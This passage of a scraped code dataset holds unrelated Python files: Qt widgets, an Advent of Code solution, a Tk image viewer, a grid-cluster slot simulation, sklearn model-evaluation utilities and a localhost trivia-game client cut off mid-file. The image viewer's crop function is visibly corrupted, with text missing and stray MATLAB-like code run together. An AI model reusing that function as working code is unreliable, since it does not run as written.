ColorButton(QtWidgets.QPushButton):\r\n \r\n myParent = None\r\n variableConfig = None\r\n\r\n def __init__(self, parent, varCfg):\r\n QtWidgets.QPushButton.__init__(self)\r\n self.myParent = parent\r\n self.variableConfig = varCfg\r\n \r\n self.clicked.connect(self.colorButtonClick)\r\n\r\n def colorButtonClick(self):\r\n\r\n oldc = self.variableConfig.color\r\n r = (oldc >> 16) & 0xff\r\n g = (oldc >> 8) & 0xff\r\n b = oldc & 0xff\r\n \r\n c = QtGui.QColor(r, g, b)\r\n res = QtWidgets.QColorDialog.getColor(c)\r\n \r\n if (res.value() != 0):\r\n newc = (res.red() << 16) + (res.green() << 8) + res.blue() \r\n \r\n if (newc != oldc):\r\n self.variableConfig.color = newc\r\n self.variableConfig.floatColor = (res.red()/255.0, res.green()/255.0, res.blue()/255.0)\r\n self.updateIcon()\r\n \r\n if (not self.myParent.canvasGraph.isAnimationRunning()):\r\n self.myParent.canvasGraph.updateCharts()\r\n\r\n\r\n def updateIcon(self):\r\n c = self.variableConfig.color\r\n color = QtGui.QColor((c >> 16) & 0xff, (c >> 8) & 0xff, c & 0xff, 0xff)\r\n\r\n pixmap = QtGui.QPixmap(40, 40)\r\n pixmap.fill(color)\r\n icon = QtGui.QIcon(pixmap)\r\n self.setIcon(icon)\r\n\r\n\r\nclass ScaleSpinner(QtWidgets.QSpinBox):\r\n \r\n myParent = None\r\n lastValue = None\r\n sign = None\r\n variableConfig = None\r\n \r\n def __init__(self, parent, varCfg):\r\n global spinnerCount\r\n \r\n QtWidgets.QSpinBox.__init__(self)\r\n self.myParent = parent\r\n self.variableConfig = varCfg\r\n\r\n self.setWrapping(True)\r\n self.setRange(-9, 9)\r\n self.setPrefix('1e')\r\n self.setValue(0)\r\n self.lastValue = 0\r\n self.sign = 1\r\n \r\n self.valueChanged.connect(self.valChanged)\r\n \r\n def valChanged(self):\r\n self.valueChanged.disconnect(self.valChanged)\r\n\r\n old = self.lastValue\r\n new = self.value()\r\n \r\n if ((old == 9 and new == -9) or \r\n (old == -9 and new == 9)):\r\n self.sign *= -1\r\n self.setPrefix(str(int(self.sign))+'e')\r\n \r\n self.lastValue = new\r\n self.valueChanged.connect(self.valChanged)\r\n \r\n self.variableConfig.scale = self.getMultiplicator()\r\n \r\n def getMultiplicator(self):\r\n return self.sign * (10**self.value())\r\n \r\n def setMultiplicator(self, m):\r\n \r\n if (m < 
0.0):\r\n self.sign = -1\r\n self.setPrefix('-1e')\r\n else:\r\n self.sign = 1\r\n self.setPrefix('1e')\r\n \r\n self.setValue(int(round(log(self.sign*m, 10))))\r\n","repo_name":"iSYSTEMLabs/daqIDEA","sub_path":"src/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":14170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29564480785","text":"def checker(i, numbers):\n target = numbers[i]\n prevNum = numbers[i-25: i]\n if prevNum.count(target/2) > 1:\n return True\n prevSet = set(prevNum)\n prevSet.discard(target/2)\n for iterator in prevSet:\n if target-iterator in prevSet:\n return True\n return False\n\ndef findNumber(numbers):\n for i in range(25, len(numbers)):\n if not checker(i, numbers):\n return numbers[i]\n\ndef weakness(numbers):\n target = findNumber(numbers)\n for i, num in enumerate(numbers):\n aux = [num]\n next = i+1\n while sum(aux) < target:\n aux.append(numbers[next])\n next += 1\n if len(aux) >= 2 and sum(aux) == target:\n return min(aux) + max(aux)\n\ndef main():\n with open(\"inputDay9.txt\", 'r') as _file:\n numbers = list(map(int, _file.read().splitlines()))\n print(weakness(numbers))\nmain()\n\n","repo_name":"MAInformatico/Advent_Of_Code2020","sub_path":"day9part2.py","file_name":"day9part2.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36678441501","text":"\n\"\"\"\nimtools toolbox\nauthor: Lionel Moisan\n\nv0.1 (10/2022): initial version (View)\n\navailable functions/classes:\nload(filename): load image\nView(image): interactive visualization\n\"\"\"\n\nfrom matplotlib import image\nimport tkinter as tk\nimport numpy as np\n\ndef load(filename):\n return image.imread(filename)\n\nclass View():\n def __init__(self, image, name=\"Image Viewer\"):\n self.win = tk.Tk()\n self.name = name # window name\n self.ny, self.nx = image.shape # window size\n self.u = image # source image\n self.dyn = [np.min(self.u),np.max(self.u)]\n self.x0, self.y0 = 0, 0 # coordinates in u of the displayed top-left pixel\n self.zoom = 1 # zoom factor\n self.zoom_method = 'nearest neighbor' # zoom method\n self.dragflag = False # no drag-and-drop in progress\n self.win.title(self.name)\n self.can = tk.Canvas(self.win, height=self.ny, width=self.nx)\n self.can.pack()\n self.compute_display()\n# self.can.create_image(0, 0, image=self.photo, anchor=tk.NW)\n # key/mouse bindings (event names here assume standard X11 conventions: wheel up/down = Button-4/5)\n self.win.bind(\"c\", self.max_contrast)\n self.win.bind(\"q\", self.quit) \n self.win.bind(\"<Escape>\", self.quit) \n self.win.bind(\"<Motion>\", self.on_move)\n self.win.bind(\"<Button-4>\", self.zoom_in)\n self.win.bind(\"<Button-2>\", self.zoom_reset) \n self.win.bind(\"<Button-5>\", self.zoom_out) \n self.win.mainloop()\n\n def compute_display(self):\n v = self.crop(self.u, self.x0, self.y0, self.nx, self.ny, self.zoom, self.zoom_method, 0)\n den = max(1e-100,self.dyn[1]-self.dyn[0])\n v = np.minimum(255,np.maximum(0,255*(v-self.dyn[0])/den))\n header = 'P5 '+str(self.nx)+' '+str(self.ny)+' 255 '\n xdata = bytes(header, 'ascii') + v.astype(dtype=np.uint8).tobytes()\n self.photo = tk.PhotoImage(width=self.nx, height=self.ny, data=xdata, format='PPM')\n self.can.create_image(0, 0, image=self.photo, anchor=tk.NW)\n \n def crop(self, u, x0, y0, nx, ny, zoom, zoom_method, bg):\n v = bg * np.ones((ny,nx))\n x = x0 + np.arange(nx)/zoom # positions on u\n y = y0 + np.arange(ny)/zoom\n # nearest neighbor interpolation\n x = np.round(x).astype('int')\n y = 
np.round(y).astype('int')\n ix1 = np.argmax(x>=0)\n iy1 = np.argmax(y>=0) \n ix2 = nx - np.argmax(x[::-1]0 or fig.UserData.z>1:\n oldz = fig.UserData.z;\n fig.UserData.z = max(1,fig.UserData.z+dz);\n if fig.UserData.z==1:\n fig.UserData.x0 = 1;\n fig.UserData.y0 = 1;\n else:\n pos = mouse_location(fig);\n # nx0 vérifie x0+xpos/oldz = nx0+xpos/newz\n fig.UserData.x0 = fig.UserData.x0+pos(1)/oldz-pos(1)/fig.UserData.z;\n fig.UserData.y0 = fig.UserData.y0+pos(2)/oldz-pos(2)/fig.UserData.z;\n update_figname(fig);\n redraw = true;\n else:\n printf(\"unrecognized event: %s\\n\",event.EventName);\n if redraw:\n im.CData = compute_display(fig.UserData);\n \"\"\"\n\n # zoom in\n def zoom_in(self, event):\n oldz = self.zoom\n self.zoom *= 2\n self.x0 = self.x0 + (event.x-1)*(1/oldz - 1/self.zoom)\n self.y0 = self.y0 + (event.y-1)*(1/oldz - 1/self.zoom)\n# print(\"new zoom is {}\".format(self.zoom))\n self.compute_display()\n self.on_move(event)\n \n # zoom reset\n def zoom_reset(self, event):\n if self.zoom!=1:\n self.zoom = 1\n self.x0, self.y0 = 0, 0\n self.compute_display()\n self.on_move(event)\n\n # zoom out\n def zoom_out(self, event):\n if self.zoom==2:\n self.zoom_reset(event)\n if self.zoom>1:\n oldz = self.zoom\n self.zoom //= 2\n self.x0 = self.x0 + (event.x-1)*(1/oldz - 1/self.zoom)\n self.y0 = self.y0 + (event.y-1)*(1/oldz - 1/self.zoom)\n# print(\"new zoom is {}\".format(self.zoom))\n self.compute_display()\n self.on_move(event) \n\n # maximize contrast\n def max_contrast(self, event):\n v = self.crop(self.u, self.x0, self.y0, self.nx, self.ny, self.zoom, self.zoom_method, 0)\n self.dyn = [np.min(v), np.max(v)]\n self.on_move(event)\n self.compute_display()\n \n def on_move(self, event):\n x = self.x0 + (event.x-1)/self.zoom\n y = self.y0 + (event.y-1)/self.zoom\n if self.zoom==1:\n self.win.title(self.name+\" x={:g} y={:g} (range=[{:g},{:g}])\".format(x,y,self.dyn[0],self.dyn[1]))\n else:\n self.win.title(self.name+\" x={:g} y={:g} (range=[{:g},{:g}], zoom={})\".format(x,y,self.dyn[0],self.dyn[1],self.zoom))\n \n def quit(self, event):\n self.win.destroy()\n\n# Zoom / Unzoom of an image with Fourier interpolation\n# (zero-padding / frequency cutoff)\ndef fftzoom(u, z=2):\n ny,nx = u.shape\n mx = int(z*nx)\n my = int(z*ny)\n dx = nx//2 - mx//2\n dy = ny//2 - my//2\n if z>=1:\n #===== zoom in\n v = np.zeros((my,mx), dtype=np.complex)\n v[-dy:-dy+ny,-dx:-dx+nx] = np.fft.fftshift(np.fft.fft2(u))\n else:\n #===== zoom out\n f = np.fft.fftshift(np.fft.fft2(u));\n v = f[dy:dy+my, dx:dx+mx]\n if mx%2==0:\n v[:, 0] = 0 # cancel non-Shannon frequencies\n if my%2==0:\n v[0, :] = 0 # cancel non-Shannon frequencies\n return z*z*np.real(np.fft.ifft2(np.fft.ifftshift(v)))\n","repo_name":"louisbzk/Subpixel","sub_path":"TP_2/imtools.py","file_name":"imtools.py","file_ext":"py","file_size_in_byte":5998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19698701347","text":"def create_grid(columns):\n grid = [list(column) for column in zip(*columns)]\n return grid\n\n\ndef get_sub_grids(grid):\n grid_2x2 = [row[2:4] for row in grid[2:4]]\n grid_4x4 = [row[1:5] for row in grid[1:5]]\n return grid_2x2, grid_4x4\n\n\ndef dfs(i, j, grid, wild='🃏'):\n symbol = grid[i][j]\n wild_neighbors = set() # This set will hold the symbols of the non-wild neighbors of a wild cell\n\n if symbol == wild: # Check if there are any same symbol neighbors\n for dx, dy in [(0, 1), (0, -1), (1, 0), (-1, 0)]:\n nx, ny = i + dx, j + dy\n if 0 <= nx < len(grid) and 0 <= ny 
< len(grid[0]) and grid[nx][ny] != wild:\n wild_neighbors.add(grid[nx][ny])\n\n stack = [(i, j)]\n visited = set()\n cluster_cells = set()\n while stack:\n x, y = stack.pop()\n if (x, y) in visited:\n continue\n visited.add((x, y))\n cluster_cells.add((x, y))\n for dx, dy in [(0, 1), (0, -1), (1, 0), (-1, 0)]:\n nx, ny = x + dx, y + dy\n if 0 <= nx < len(grid) and 0 <= ny < len(grid[0]):\n if grid[nx][ny] in wild_neighbors or (grid[nx][ny] == symbol and grid[nx][ny] != wild) or grid[nx][ny] == wild:\n stack.append((nx, ny))\n\n return cluster_cells if len(cluster_cells) >= 4 else set() # Return cells if it's a cluster\n\n\n\ndef count_clusters(grid):\n all_cluster_cells = set() # Keep track of all cells that are part of any cluster\n clusters = []\n cluster_sizes = []\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if (i, j) not in all_cluster_cells: # Only start a new DFS if the cell is not part of any cluster\n cluster_cells = dfs(i, j, grid)\n if cluster_cells: # If it's a cluster\n all_cluster_cells.update(cluster_cells) # Add the cells to the set of all cluster cells\n clusters.append(cluster_cells)\n cluster_sizes.append(len(cluster_cells))\n return len(clusters), cluster_sizes\n\n\n\n\n\n# columns = [\n# ['⭐', '🟩', '🔷', '⭐', '🔷', '🔶'],\n# ['⭐', '⭐', '🔶', '⭐', '🔷', '🔶'],\n# ['🔷', '🟩', '🃏', '🃏', '🔷', '🟩'],\n# ['⭐', '🟩', '🃏', '🃏', '🃏', '🟩'],\n# ['⭐', '🔶', '🔷', '⭐', '🔷', '🔶'],\n# ['⭐', '🟩', '🔷', '🟩', '🔷', '🃏']\n# ]\ncolumns = [\n ['⭐', '🟩', '🔷', '⭐', '🔷', '🔶'],\n ['⭐', '🃏', '🃏', '🃏', '🔷', '🔶'],\n ['🔷', '🃏', '🟩', '🟩', '🔷', '🟩'],\n ['⭐', '🃏', '🔶', '⭐', '🔶', '🟩'],\n ['⭐', '🔶', '🔷', '⭐', '🔷', '🔶'],\n ['⭐', '🟩', '🔷', '🟩', '🔷', '🔶']\n]\n\ngrid = create_grid(columns)\ngrid_2x2, grid_4x4 = get_sub_grids(grid)\n\nclusters_2x2, sizes_2x2 = count_clusters(grid_2x2)\nclusters_4x4, sizes_4x4 = count_clusters(grid_4x4)\nclusters_6x6, sizes_6x6 = count_clusters(grid)\n\nprint(f\"2x2 grid has {clusters_2x2} clusters with sizes {sizes_2x2}\")\nprint(f\"4x4 grid has {clusters_4x4} clusters with sizes {sizes_4x4}\")\nprint(f\"6x6 grid has {clusters_6x6} clusters with sizes {sizes_6x6}\")\n\n","repo_name":"Fishcuit/AhluicSim","sub_path":"oldDfsSims/sim4.py","file_name":"sim4.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38763796747","text":"''' This file contains sklearn models for downstream takss '''\n\n# utils\nfrom functools import partial\n\nimport numpy as np\nimport pandas as pd\n# models\nfrom sklearn.ensemble import (GradientBoostingRegressor,\n RandomForestClassifier, RandomForestRegressor)\nimport xgboost as xgb\nfrom sklearn.feature_selection import SelectFdr, SelectKBest, f_regression\nfrom sklearn.linear_model import ElasticNet, LogisticRegression\n# Metrics\nfrom sklearn.metrics import (accuracy_score, average_precision_score, f1_score,\n make_scorer, mean_absolute_error,\n mean_absolute_percentage_error,\n mean_squared_error, precision_score, r2_score,\n recall_score, roc_auc_score)\n# hyperparameter tunning\nfrom sklearn.model_selection import GridSearchCV, KFold\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier, MLPRegressor\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC, SVR\nfrom sklearn.utils import resample\nfrom utils.python_logger import get_logger\nfrom tqdm import tqdm\n\nfrom applications.tasks.task_base import TaskBase\n\nLOGGER = 
get_logger()\n\n\nREGRESSION_METRIC_DICT = {'MAE': mean_absolute_error,\n 'MAPE': mean_absolute_percentage_error,\n 'RMSE': partial(mean_squared_error, squared=False),\n 'R2': r2_score}\n\n\nCLASSIFICATION_METRIC_DICT = {'Accuracy': accuracy_score,\n 'F1': partial(f1_score, average='weighted'),\n 'Precision': partial(precision_score, average='weighted'),\n 'Recall': partial(recall_score, average='weighted'),\n 'AUROC': partial(roc_auc_score, average='weighted', multi_class='ovr'),\n 'AUPRC': partial(average_precision_score, average='weighted'),\n }\n\n\n# Dictionaries\nRANDOM_DICT = {'random_state': 9001}\nNJOB_DICT = {'n_jobs': -1} # using all the processers\n\n\n# model_dicts\n# REGRESSION\nli_reg = {'basemodel': partial(ElasticNet, l1_ratio=1, normalize=True, **RANDOM_DICT),\n 'params': dict(alpha=[0.1, 0.5, 1])}\n\nrfr = {'basemodel': partial(RandomForestRegressor, **RANDOM_DICT, **NJOB_DICT),\n 'params': dict(n_estimators=[10, 100, 200])}\n\nsvr = {'basemodel': partial(SVR, max_iter=1000), # efficiency\n 'params': dict(degree=[3, 5, 7], C=[0.1, 1, 10], epsilon=[0.01, 0.1, 1])}\n\nmlpr = {'basemodel': partial(MLPRegressor, **RANDOM_DICT, early_stopping=True, max_iter=2000),\n 'params': dict(hidden_layer_sizes=[(100, 10),\n (100, 20),\n (200, 20),\n (400, 40)])}\n\ngboost = {'basemodel': partial(GradientBoostingRegressor, **RANDOM_DICT),\n 'params': dict(learning_rate=[0.01],\n n_estimators=[200])}\n\nREGRESSION_MODELS = {'linear_regression': li_reg,\n 'random_forest': rfr,\n 'svr': svr,\n 'mlp': mlpr,\n }\n\n# CLASSIFICATION\nlr = {'basemodel': partial(LogisticRegression, penalty='l1', solver='saga', **RANDOM_DICT, **NJOB_DICT),\n 'params': dict(C=[0.01, 0.1])}\n\nknn = {'basemodel': partial(KNeighborsClassifier, **NJOB_DICT),\n 'params': dict(n_neighbors=[3, 5, 7, 10], p=[1, 2, 5])}\n\nsvc = {'basemodel': partial(SVC, **RANDOM_DICT, probability=True, max_iter=1000),\n 'params': dict(C=[0.01, 0.1, 1], degree=[1, 2, 3])}\n\nrf = {'basemodel': partial(RandomForestClassifier, **RANDOM_DICT, **NJOB_DICT),\n 'params': dict(n_estimators=[100, 200, 500, 1000, ],\n max_depth=[10, 100],\n max_features=['auto'],\n min_samples_leaf=[1, 4])}\n\nmlp = {'basemodel': partial(MLPClassifier, **RANDOM_DICT, early_stopping=True, max_iter=2000),\n 'params': dict(hidden_layer_sizes=[(100, 10), (100, 20), (200, 20), (400, 40)])}\n\nxgbtree = {'basemodel': partial(xgb.XGBClassifier, verbosity=1, **RANDOM_DICT, **NJOB_DICT),\n 'params': dict(learning_rate=[0.01, 0.1],\n n_estimators=[100],\n reg_alpha=[1, 10])}\n\nCLASSIFICATION_MODELS = {'logistic_regression': lr,\n 'k_nearest_neighbors': knn,\n 'svc': svc,\n 'random_forest': rf,\n 'mlp': mlp,\n 'xgboost': xgbtree}\n\n\n# preprocessing for pipeline\nfor modelname, modeldict in REGRESSION_MODELS.items():\n pdict = modeldict['params'].copy()\n modeldict['params'] = {}\n for param, paramvalue in pdict.items():\n modeldict['params'][\"predictor__\"+param] = paramvalue\n\nfor modelname, modeldict in CLASSIFICATION_MODELS.items():\n pdict = modeldict['params'].copy()\n modeldict['params'] = {}\n for param, paramvalue in pdict.items():\n modeldict['params'][\"predictor__\"+param] = paramvalue\n\n\nMODELS = {'regression': REGRESSION_MODELS,\n 'classification': CLASSIFICATION_MODELS}\n\n\ndef model_evaluation(y_true,\n y_pred,\n y_proba=None,\n y_decision=None,\n scoring_func_dict=REGRESSION_METRIC_DICT,\n task_type='regression'):\n if task_type == \"regression\":\n return dict((key, func(y_true, y_pred)) for (key, func) in scoring_func_dict.items())\n elif task_type 
== \"classification\":\n result_dict = {}\n for (key, func) in scoring_func_dict.items():\n if key == 'AUROC':\n if y_proba.shape[1] > 2:\n y_score = y_proba\n else:\n y_score = y_proba[:, 1]\n result_dict[key] = func(y_true=y_true,\n y_score=y_score)\n elif key == 'AUPRC':\n continue # NOTE: not implemented at the moment\n if y_proba.shape[1] > 2:\n continue\n result_dict[key] = func(y_true=y_true,\n y_score=y_proba[:, 1])\n else:\n result_dict[key] = func(y_true=y_true,\n y_pred=y_pred)\n return result_dict\n\n\ndef grid_cv_model(model, params, X, Y, scoring=None, verbose=1,\n cv_params={\"n_splits\": 3, \"shuffle\": True, \"random_state\": 9001}):\n cv = KFold(**cv_params)\n clf = GridSearchCV(model,\n params,\n cv=cv,\n scoring=scoring,\n verbose=int(verbose)*2) # verbose = 2 (a little more information) or 0\n clf.fit(X, Y)\n LOGGER.info(f\"best parameters: {clf.best_params_}\")\n return clf\n\n\ndef find_best_param(model_meta, X, Y, hparams={}, search=True, verbose=1):\n if search:\n basemodel = model_meta['basemodel']()\n clf = GridSearchCV(basemodel,\n model_meta['params'],\n verbose=int(verbose)*2) # verbose = 2 (a little more information) or 0\n clf.fit(X['train'], Y['train'])\n LOGGER.info(f\"best parameters: {clf.best_params_}\")\n return clf.best_params_\n else:\n return hparams\n\n\ndef model_pipeline(model_base, base_params={}, best_params={}):\n # new step: feature selection\n # TODO: implement this\n model = Pipeline(\n [('scaler', StandardScaler()),\n # ('selector', SelectFdr(score_func=f_regression, alpha=1e-2)),\n # ('selector', SelectKBest(score_func=f_regression, k=500)),\n ('predictor', model_base(**base_params)),\n ], verbose=True)\n model.set_params(**best_params)\n return model\n\n\ndef cv_tuning_model(model,\n model_param_dict: dict,\n X, Y):\n \"\"\" tune the model with CV, return best parameters \"\"\"\n clf = grid_cv_model(model=model,\n params=model_param_dict,\n X=X,\n Y=Y,)\n\n best_params = clf.best_params_\n cv_results = {k: v for k, v in clf.cv_results_.items()\n if k.endswith(\"score\")}\n return best_params, cv_results\n\n\ndef train_eval_model(X: dict, Y: dict, model,\n task_type: str, inverse_transform=None,):\n\n metrics_func_dict = REGRESSION_METRIC_DICT if task_type == \"regression\" else CLASSIFICATION_METRIC_DICT\n # 2. train model\n model = model.fit(X['train'], Y['train'])\n\n # 3. 
evaluation\n if task_type == 'regression':\n if inverse_transform != None:\n y_pred = inverse_transform(Y=model.predict(X['val']))\n else:\n y_pred = model.predict(X['val'])\n y_true = Y['val']\n\n metrics = model_evaluation(y_true=y_true,\n y_pred=y_pred,\n y_proba=None,\n y_decision=None,\n scoring_func_dict=metrics_func_dict,\n task_type=task_type)\n pred_dict = {}\n elif task_type == 'classification':\n y_true = Y['val']\n y_pred = model.predict(X['val'])\n # multiclass, should not limit class\n y_proba = model.predict_proba(X['val'])\n # y_decision = model.decision_function(X['val'])\n y_decision = None\n metrics = model_evaluation(y_true=y_true,\n y_pred=y_pred,\n y_proba=y_proba,\n y_decision=y_decision,\n scoring_func_dict=metrics_func_dict,\n task_type=task_type)\n pred_dict = {'y_proba': y_proba, 'y_decision': y_decision}\n return metrics, y_pred, pred_dict\n\n\ndef train_eval_bootstrapping(times: int, X: dict, Y: dict, model,\n task_type: str, inverse_transform=None, seed=None):\n results = {}\n metrics_func_dict = REGRESSION_METRIC_DICT if task_type == \"regression\" else CLASSIFICATION_METRIC_DICT\n for i in tqdm(range(times)):\n # bootstrapping:\n index = resample(\n list(range(len(X['train']))), replace=True, random_state=seed)\n x_train, y_train = X['train'][index], Y['train'][index]\n\n # 2. train model\n model = model.fit(x_train, y_train)\n\n # 3. evaluation\n if task_type == 'regression':\n if inverse_transform != None:\n y_pred = inverse_transform(Y=model.predict(X['val']))\n else:\n y_pred = model.predict(X['val'])\n y_true = Y['val']\n\n metrics = model_evaluation(y_true=y_true,\n y_pred=y_pred,\n y_proba=None,\n y_decision=None,\n scoring_func_dict=metrics_func_dict,\n task_type=task_type)\n # pred_dict = {}\n elif task_type == 'classification':\n y_true = Y['val']\n y_pred = model.predict(X['val'])\n # multiclass, should not limit class\n y_proba = model.predict_proba(X['val'])\n # y_decision = model.decision_function(X['val'])\n y_decision = None\n metrics = model_evaluation(y_true=y_true,\n y_pred=y_pred,\n y_proba=y_proba,\n y_decision=y_decision,\n scoring_func_dict=metrics_func_dict,\n task_type=task_type)\n # pred_dict = {'y_proba': y_proba, 'y_decision': y_decision}\n if not results:\n results = metrics.copy()\n for k in results.keys():\n results[k] = [results[k]]\n\n else:\n for k in results.keys():\n results[k].append(metrics[k])\n return results\n\n\ndef predict_with_model(task_type: str,\n X: dict, Y: dict,\n inverse_transform=None,\n model_name: str = 'random_forest',\n hparam_dict={},\n tune_hparams=True,\n bootstrapping=False,\n verbose=True):\n \"\"\"\n NOTE: change preprocessing to be out side this function; avoid repeated operations\n Make predictions with one type of model, hparams are tuned, model results are returned\n Args:\n X (Dict): input X, has key 'train' and 'val'\n Y (Dict): input Y, has key 'train' and 'val'\n task_type (str, optional): type of task, should be either classification or regression. Defaults to 'classification'.\n model_name (str, optional): name of the model. Defaults to 'random_forest'.\n verbose (bool, optional): whether to output some progress. Defaults to True.\n\n Returns:\n Dict: metrics\n \"\"\"\n\n if verbose:\n LOGGER.info(f\"======{model_name}======\")\n assert task_type in ['classification', 'regression']\n\n # 1. 
hparams, either load or search or skip\n model_meta = MODELS[task_type][model_name]\n model = model_pipeline(model_base=model_meta['basemodel'])\n\n if not tune_hparams:\n # if not tune hyperparameters, then just load previous best parameters, if no, just left blank\n best_params = {\n } if model_name not in hparam_dict else hparam_dict[model_name]\n else:\n best_params, cv_results = cv_tuning_model(model=model,\n model_param_dict=model_meta['params'],\n X=X['train'],\n Y=Y['train'])\n LOGGER.info(f\"result for CV:{cv_results}\")\n model = model_pipeline(model_base=model_meta['basemodel'],\n best_params=best_params)\n if not bootstrapping:\n metrics, y_pred, pred_dict = train_eval_model(X=X, Y=Y,\n model=model, task_type=task_type,\n inverse_transform=inverse_transform)\n LOGGER.info(f\"result for validation set:{metrics}\")\n return metrics, y_pred, pred_dict, best_params\n else:\n metrics = train_eval_bootstrapping(times=10, X=X, Y=Y, model=model, task_type=task_type,\n inverse_transform=inverse_transform)\n\n LOGGER.info(f\"result for validation set:{metrics}\")\n return metrics, best_params\n\n\ndef predict_task(task: TaskBase,\n X, Y,\n models='all',\n hparam_dict={},\n results=[],\n tune_hparams=True,\n bootstrapping=False,\n verbose=True):\n\n # draw AUROC and AUPRC curve for classification\n prediction_models = MODELS[task.task_type]\n if models == 'all':\n models = list(prediction_models.keys())\n elif isinstance(models, str):\n models = [models]\n assert isinstance(models, list)\n LOGGER.info(f\"models used {models}\")\n \n ### initialize results\n if results:\n result_dict, pred_dict, pred_stats, best_hparams = results\n pred_dict['true'] = Y['val']\n else:\n result_dict, pred_dict, pred_stats, best_hparams = {}, {}, {}, {}\n pred_dict['true'] = Y['val']\n if bootstrapping:\n result_dict_bootstrapping = {}\n # preprocessing with task.transform\n if verbose:\n LOGGER.info(\n f\"Before transform: X shape = train:{np.array(X['train']).shape}, val:{np.array(X['val']).shape}; Y shape = train:{np.array(Y['train']).shape}, val:{np.array(Y['val']).shape}\")\n\n ### process data\n X_processed, Y_processed = task.transform(X, Y)\n\n if verbose:\n # report data summary\n data_summary(X_processed, Y_processed, task.task_type)\n\n ### dimensionality reduction\n \n\n ### predict\n for model_name in models:\n model_result = predict_with_model(task_type=task.task_type,\n X=X_processed, Y=Y_processed,\n model_name=model_name,\n hparam_dict=hparam_dict,\n tune_hparams=tune_hparams,\n bootstrapping=bootstrapping,\n verbose=verbose)\n if not bootstrapping:\n result_dict[model_name], \\\n pred_dict[model_name], \\\n pred_stats[model_name], \\\n best_hparams[model_name] = model_result\n else:\n result_dict_bootstrapping[model_name], best_hparams[model_name] = model_result\n if not bootstrapping:\n return result_dict, pred_dict, pred_stats, best_hparams\n\n else:\n return result_dict_bootstrapping, best_hparams\n\n\ndef data_summary(X, Y, task_type):\n data_summary = f\"X shape = train:{X['train'].shape}, val:{X['val'].shape}; Y shape = train:{Y['train'].shape}, val:{Y['val'].shape}\"\n if task_type == \"classification\":\n vtrain, ctarin = np.unique(\n np.array(Y['train']), return_counts=True)\n train_count = pd.DataFrame(np.array((vtrain, ctarin)).T,\n columns=[\"value\", \"count\"])\n vval, cval = np.unique(\n np.array(Y['val']), return_counts=True)\n val_count = pd.DataFrame(np.array((vval, cval)).T,\n columns=[\"value\", \"count\"])\n data_summary += \"\\n\" + \\\n f\"Y classes = \\n train: 
\\n{train_count}; \\n val: \\n{val_count}\"\n LOGGER.info(data_summary)\n pass\n","repo_name":"gevaertlab/Variational-Auto-Encoder","sub_path":"applications/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":18012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"368043998","text":"class listAverage():\n\n def average(self):\n n = int(input(\"Enter number of elements in Array\"))\n a= []\n for i in range(0,n):\n element = int(input(\"Enter the number in the Array\"))\n a.append(element)\n avg = sum(a)/n\n print(\"Average of Numbers is : \" + str(avg) + \"Number of elements are : \" + str(n) )\n\n\nla = listAverage()\nla.average()\n","repo_name":"Deepti3006/InterviewPractise","sub_path":"averageOfList.py","file_name":"averageOfList.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43391454701","text":"import socket\r\nimport chatlib # To use chatlib functions or consts, use chatlib.****\r\n\r\nMAX_MSG_SIZE = 1024\r\nSERVER_IP = \"127.0.0.1\" # Our server will run on same computer as client\r\nSERVER_PORT = 5678\r\n\r\n\r\ndef build_and_send_message(conn, code, data=''):\r\n\r\n msg = chatlib.build_message(code,data)\r\n conn.send(msg.encode())\r\n\r\ndef recv_message_and_parse(conn):\r\n\r\n msg = conn.recv(MAX_MSG_SIZE).decode()\r\n cmd, data = chatlib.parse_message(msg)\r\n return cmd, data\r\n\r\ndef connect():\r\n\r\n my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n return my_socket\r\n\r\ndef error_and_exit(error_msg):\r\n\r\n print(error_msg)\r\n exit()\r\n\r\ndef build_send_recv_parse(conn, command, data=''):\r\n\r\n build_and_send_message(conn, command,data)\r\n cmd, code = recv_message_and_parse(conn)\r\n return cmd, code\r\n\r\ndef get_score(conn):\r\n\r\n cmd, data = build_send_recv_parse(conn,chatlib.PROTOCOL_CLIENT[\"myscore_msg\"])\r\n if cmd == chatlib.PROTOCOL_SERVER[\"yourscore_msg\"] :\r\n return \"your score is \" + data\r\n else:\r\n error_and_exit(cmd)\r\n\r\ndef get_highscore(conn):\r\n\r\n cmd, data = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"highscore_msg\"])\r\n if cmd == chatlib.PROTOCOL_SERVER[\"allscore_msg\"]:\r\n return data\r\n else:\r\n error_and_exit(cmd)\r\n\r\ndef play_question(conn):\r\n\r\n cmd, data = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"getquestion_msg\"])\r\n\r\n if cmd == chatlib.PROTOCOL_SERVER[\"yourquestion_msg\"]:\r\n splited = data.split('#')\r\n n, a, b, c, d, e = splited\r\n print('Q: ' + a, \" \\n 1. \" + b, \"\\n 2. \" + c, \"\\n 3. \" + d, \" \\n 4. 
